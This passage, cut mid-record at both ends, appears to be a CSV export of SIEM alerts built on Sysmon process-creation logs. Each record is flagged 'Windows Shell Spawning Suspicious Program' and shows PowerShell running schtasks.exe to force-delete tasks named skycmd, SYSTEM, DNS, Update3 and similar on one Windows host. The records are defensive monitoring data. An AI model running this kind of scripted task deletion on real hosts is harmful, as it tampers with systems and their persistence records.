Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.838",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.017 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00103fcc2100} +ProcessId: 1720 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.019921300Z"",""eventRecordID"":""2819"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.017\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00103fcc2100}\r\nProcessId: 1720\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.017"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00103fcc2100}"",""processId"":""1720"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:19:01.823",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.985 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010d1c92100} +ProcessId: 2432 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.988020300Z"",""eventRecordID"":""2818"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.985\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010d1c92100}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: 
Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.985"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010d1c92100}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.791",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.952 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00101cc72100} +ProcessId: 4188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.958315700Z"",""eventRecordID"":""2817"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.952\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00101cc72100}\r\nProcessId: 4188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.952"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00101cc72100}"",""processId"":""4188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.775",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.898 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00108ac42100} +ProcessId: 6072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.901029000Z"",""eventRecordID"":""2816"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.898\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00108ac42100}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:31.898"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00108ac42100}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.760",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.861 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010f9c12100} +ProcessId: 1344 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.865950800Z"",""eventRecordID"":""2815"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.861\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010f9c12100}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.861"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010f9c12100}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.744",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.820 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010c6bf2100} +ProcessId: 1928 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.822709300Z"",""eventRecordID"":""2814"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.820\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010c6bf2100}\r\nProcessId: 1928\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.820"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010c6bf2100}"",""processId"":""1928"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 